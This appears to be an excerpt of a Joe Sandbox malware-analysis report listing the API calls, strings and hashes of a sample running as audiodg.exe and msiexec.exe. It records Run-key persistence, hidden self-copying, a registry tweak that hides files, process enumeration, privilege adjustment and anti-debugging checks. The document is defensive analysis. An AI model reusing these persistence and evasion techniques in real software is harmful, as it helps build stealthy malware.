SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995

Strings

.exe, xrefs: 00007FF7A91B3986

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
String ID: .exe
API String ID: 1846285901-4119554291
Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
Instruction ID: 657b805cf4ec8e02042701622303c4db152eca361d1cc5c1e8b8023c7fb0cb2d
Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
Instruction Fuzzy Hash: 6111212172998685DB61BF25F85476AA3B2FBC4B80F815031DA8E87E39DE3CD525C710

Function 00007FF7A91B2E6C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32 ref: 00007FF7A91B2E85
ReleaseMutex.KERNEL32 ref: 00007FF7A91B2E9D
CloseHandle.KERNEL32 ref: 00007FF7A91B2EA8
GetLastError.KERNEL32 ref: 00007FF7A91B2EB5
ReleaseMutex.KERNEL32 ref: 00007FF7A91B2EC7
CloseHandle.KERNEL32 ref: 00007FF7A91B2ED2

Strings

rbNSpGEsyb, xrefs: 00007FF7A91B2E70

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID: rbNSpGEsyb
API String ID: 299056699-189039185
Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
Instruction ID: 51415abe456518a1eeefa84989e04dc74184da2e6d17019409f7cc799084f17d
Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
Instruction Fuzzy Hash: AD01C026A0DA4181E732BF11F854269A7B2FBDCB95F850531D94EC2A74CF3CD6A58620

Function 00007FF7A91B3E24 Relevance: 13.5, APIs: 9, Instructions: 44
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7A91B3E37
Process32FirstW.KERNEL32 ref: 00007FF7A91B3E6A
CloseHandle.KERNEL32 ref: 00007FF7A91B3E7C

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
Instruction ID: 45675ad007755a6469378cd6d83b9ac62ebe8277d5d69cda1e527e70176aa337
Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
Instruction Fuzzy Hash: 7B210031A0EA8681E771AF15F84836AE3B2FBC4754F814235C55E829B8DF3DD565CB20

Function 00007FF7A91B2F0C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF7A91B2F1E
ReleaseMutex.KERNEL32 ref: 00007FF7A91B2F36
CloseHandle.KERNEL32 ref: 00007FF7A91B2F41
GetLastError.KERNEL32 ref: 00007FF7A91B2F4E
ReleaseMutex.KERNEL32 ref: 00007FF7A91B2F60
CloseHandle.KERNEL32 ref: 00007FF7A91B2F6B

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID:
API String ID: 299056699-0
Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
Instruction ID: cee3c6548fd6d34fbdbbe4bcdebb1c7db9955d7f273c30265c8c6f1c604be7c1
Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
Instruction Fuzzy Hash: C401D226A1DA4182E722AF11F85426DA3B2FBD8B45F810535E98ED2A74CF2CD5548610

Function 00007FF7A91B3CE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF7A91B3D01
PathFindFileNameW.SHLWAPI ref: 00007FF7A91B3D14
wcslen.MSVCRT ref: 00007FF7A91B3D2A
wcsncpy.MSVCRT ref: 00007FF7A91B3DEF

Strings

Unknown, xrefs: 00007FF7A91B3DE0

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: FileName$FindModulePathwcslenwcsncpy
String ID: Unknown
API String ID: 4220601557-1654365787
Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
Instruction ID: 572ead1a65346d53afa6e67683c8d9e8ef9a9395994fffade03c501020f828b3
Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
Instruction Fuzzy Hash: ED31C77261EAC485DB71AF19F4987AAA3B1F788740F810125DA8DC3B68DF3CD165CB10

Function 00007FF7A91B3A74 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A91B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7A91B3784
Part of subcall function 00007FF7A91B3744: GetVolumeInformationW.KERNEL32 ref: 00007FF7A91B3801
Part of subcall function 00007FF7A91B3744: wsprintfW.USER32 ref: 00007FF7A91B38A2

Part of subcall function 00007FF7A91B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
Part of subcall function 00007FF7A91B38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
Part of subcall function 00007FF7A91B38C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995

GetModuleFileNameW.KERNEL32 ref: 00007FF7A91B3AB9
DeleteFileW.KERNEL32 ref: 00007FF7A91B3AC4
CopyFileW.KERNEL32 ref: 00007FF7A91B3ADD
SetFileAttributesW.KERNEL32 ref: 00007FF7A91B3AF5

Strings

Services, xrefs: 00007FF7A91B3B00

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
String ID: Services
API String ID: 3209240227-2319745855
Opcode ID: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
Instruction ID: fe7523f13ca97f2396291b87fea2420b614032b5b89e7fc21b05f00268e5a10a
Opcode Fuzzy Hash: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
Instruction Fuzzy Hash: A4018861B1A58252DB61FF24F4543AA93B1FB94744FD14031D24DC39B8EE2CD22ACB10

Function 00007FF7A91B3B84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B311C), ref: 00007FF7A91B3BC7
RegSetValueExW.ADVAPI32 ref: 00007FF7A91B3BFD
RegCloseKey.ADVAPI32 ref: 00007FF7A91B3C0C

Strings

Hidden, xrefs: 00007FF7A91B3B94
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 00007FF7A91B3B88

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: CloseOpenValue
String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
API String ID: 779948276-85274793
Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
Instruction ID: b96499bde182ee6d766777e11fa6cce4be4b2b8092ec3c359337848eaa700773
Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
Instruction Fuzzy Hash: 93012936619A808ADB51AF14F44471AB7B4F7887A4F801225EB8D83F78DF7CC155CB10

Function 00007FF7A91B4004 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7A91B4022
Process32FirstW.KERNEL32 ref: 00007FF7A91B4054
wcscmp.MSVCRT ref: 00007FF7A91B406B
CloseHandle.KERNEL32 ref: 00007FF7A91B40A1

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
String ID:
API String ID: 2850635065-0
Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
Instruction ID: 90c57c7e59dd50902081632c618d515956165548fa47239b9bce09401bb7b93d
Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
Instruction Fuzzy Hash: 1511EC71A0DA8681E771AF25F4883BAA3B1FB84754F814235D69D82AF8DF3DD514CB10

Function 00007FF7A91B3744 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32 ref: 00007FF7A91B3784
GetVolumeInformationW.KERNEL32 ref: 00007FF7A91B3801
wsprintfW.USER32 ref: 00007FF7A91B38A2

Strings

%08lX%04lX%lu, xrefs: 00007FF7A91B3893

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: DirectoryInformationVolumeWindowswsprintf
String ID: %08lX%04lX%lu
API String ID: 3001812590-640692576
Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
Instruction ID: a093925ed4b99e58a19b1d6d08544e5e862c317f23e236af5e32b69c2051a22c
Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
Instruction Fuzzy Hash: 6C31072661D6C186DB31EF64F4983AAB3B1FB84700F900126E68DC3A68EF3DC519CB10

Function 00007FF7A91B39B4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7A91B3B0C), ref: 00007FF7A91B39E4
RegSetValueExW.ADVAPI32 ref: 00007FF7A91B3A39
RegCloseKey.ADVAPI32 ref: 00007FF7A91B3A48

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF7A91B39D6

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: CloseOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 779948276-1428018034
Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
Instruction ID: 8d2fc9674485078fbd4ebea5737b2aa6986aeae1e4b3022979fc7a64cac25062
Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
Instruction Fuzzy Hash: B1115132529A4086D7919F24F44462AB7A1FB847A0F515330F9AE83BF8DF6CD055CB10

Function 00007FF7A91B2F9C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A91B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
Part of subcall function 00007FF7A91B38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
Part of subcall function 00007FF7A91B38C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995

Part of subcall function 00007FF7A91B46E4: CreateFileW.KERNEL32 ref: 00007FF7A91B472B

Part of subcall function 00007FF7A91B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7A91B414B
Part of subcall function 00007FF7A91B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7A91B415E
Part of subcall function 00007FF7A91B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7A91B4186
Part of subcall function 00007FF7A91B40E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7A91B41B1
Part of subcall function 00007FF7A91B40E4: CloseHandle.KERNEL32 ref: 00007FF7A91B41BC
Part of subcall function 00007FF7A91B40E4: OpenProcess.KERNEL32 ref: 00007FF7A91B41D1
Part of subcall function 00007FF7A91B40E4: CloseHandle.KERNEL32 ref: 00007FF7A91B4249

GetProcessHeap.KERNEL32 ref: 00007FF7A91B3037
HeapFree.KERNEL32 ref: 00007FF7A91B304A

Strings

chFrWWdQWsLFevUr, xrefs: 00007FF7A91B2FDB
.x64, xrefs: 00007FF7A91B2FEE

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
String ID: .x64$chFrWWdQWsLFevUr
API String ID: 3992431006-2286007224
Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
Instruction ID: efc31e84b9e099eb75460d5479ab779079383af964e5f92e2f5bd2283e38feec
Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
Instruction Fuzzy Hash: BF11C520A1AA8685E722FF14F8443A9A7F2FB84744FC24135D54CD6AB5DF3CA4698B60

Analysis Process: msiexec.exePID: 2228, Parent PID: 5340COMMON

Execution Graph

Execution Coverage:	23%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	478
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF7179D345C Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7179D321C: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00007FF7179D346D), ref: 00007FF7179D3220

ExitProcess.KERNEL32 ref: 00007FF7179D3476
ExitProcess.KERNEL32 ref: 00007FF7179D34D4

Strings

msiexec.exe, xrefs: 00007FF7179D34FB
svchost.exe, xrefs: 00007FF7179D3497
worker_BAccdq, xrefs: 00007FF7179D3510
worker_FDhvwc, xrefs: 00007FF7179D35CD
audiodg.exe, xrefs: 00007FF7179D354C
worker_RdDwvE, xrefs: 00007FF7179D34BF
worker_kBEqZh, xrefs: 00007FF7179D3561

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: ExitProcess$DebuggerPresent
String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
API String ID: 613740775-1953711635
Opcode ID: 8ceee07a51bd93bcdc0c94c1efd1dcbb9b80b1b3d7bb6e6e8f4b7753da0e9892
Instruction ID: 0847cd5fcdc039601dc23e0fd918e4bba807935216bfd3e4d547be9b0ca5a8bb
Opcode Fuzzy Hash: 8ceee07a51bd93bcdc0c94c1efd1dcbb9b80b1b3d7bb6e6e8f4b7753da0e9892
Instruction Fuzzy Hash: 6161FA20A18E9391FB64BB35E9DD2BDE260AF84762FC00135D54E961E7DE6DE40F8630

Function 00007FF7179D4264 Relevance: 10.6, APIs: 7, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3481), ref: 00007FF7179D4268
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3481), ref: 00007FF7179D427B
GetTokenInformation.KERNELBASE ref: 00007FF7179D42AC
GetTokenInformation.KERNELBASE ref: 00007FF7179D42DE
CloseHandle.KERNEL32 ref: 00007FF7179D42ED

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: Token$InformationProcess$CloseCurrentHandleOpen
String ID:
API String ID: 434396405-0
Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
Instruction ID: 023e6c4396f37c2cf9edc83f02147832b6df021c2afed5a9e525a335208004f7
Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
Instruction Fuzzy Hash: AB31283261CA8286D750EB15E49876EF7A0FBC47A0F901135FA8E43B69DF7CD44A8B10

Function 00007FF7179D321C Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00007FF7179D346D), ref: 00007FF7179D3220
GetCurrentProcess.KERNEL32 ref: 00007FF7179D3236
CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF7179D3244

